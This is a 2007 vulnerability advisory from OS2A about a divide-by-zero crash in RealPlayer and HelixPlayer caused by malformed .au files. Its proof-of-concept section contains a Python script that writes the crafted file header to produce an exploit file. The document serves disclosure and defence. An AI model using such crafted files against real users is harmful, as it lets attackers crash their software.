RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability
Advisory attached.
OS2A
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability
OS2A ID: OS2A_1010 08/21/2007 Issue Discovered
08/31/2007 Vendor Notification
Class: Denial of Service Severity: High
Overview:
-------------
RealPlayer/Helix Player is a media player that will play popular media formats
as well as organize your music and videos.
Description:
--------------
A Denial of Service flaw exists in RealPlayer and HelixPlayer, when a user
tries to open a malformed .au file. The flaw is due to a Division by Zero error
when processing a malformed AU file.
An attacker must entice an unsuspecting user to open a maliciously crafted AU
file.
Impact:
--------
Successful exploitation allows an attacker to crash a vulnerable application
via a specially crafted file. (Deny the service).
Affected Software(s):
---------------------
Realplayer 10.1.0.3114 and prior
Helixplayer
Tested on :
- RealPlayer-10.1.0.3114
- Realplayer-10.0.9
- Realplayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively
- Realplayer10-5Gold on Windows XP
- HelixPlayer-1.0.6.778 on FC6
AV MP3 Player and Media Player Classic are also found to be vulnerable
Affected Platform:
------------------
Microsoft Windows (All Platform)
RedHat Linux
Fedora Core Linux
SuSE Linux
Proof of Concept:
------------------
The following Python program will generate a malformed .au file
import sys
import os
head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"+
"\x02\x02\x1F\x40\x00\x00\x00\x00\x00" +
"\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")
print "[x] RealPlayer/Helix Player/Kaboodle Player DoS"
try:
f = open("exploit.au",'w')
except IOError, e:
print "Unable to open file ", e
sys.exit(0)
print "[x] File successfully opened for writing."
try:
f.write(head)
except IOError, e:
print "Unable to write to file ", e
sys.exit(0)
print "[x] File successfully written."
f.close()
print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players."
#End of program
RealPlayer crashes with the following exception,
Floating point exception$REALPLAYBIN "$@"
CVSS Score Report:
------------------
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = COMPLETE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)
CVSS Temporal Score = 6.4
Risk factor = High
Reference:
-----------
A similar attack was found recently against Windows Media Player,
http://www.safehack.com/exp/mp/mplayer11.txt
Solution/Work Around:
--------------------
Do not open untrusted .au files.
Credits:
--------
Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with
the discovery of this
vulnerability.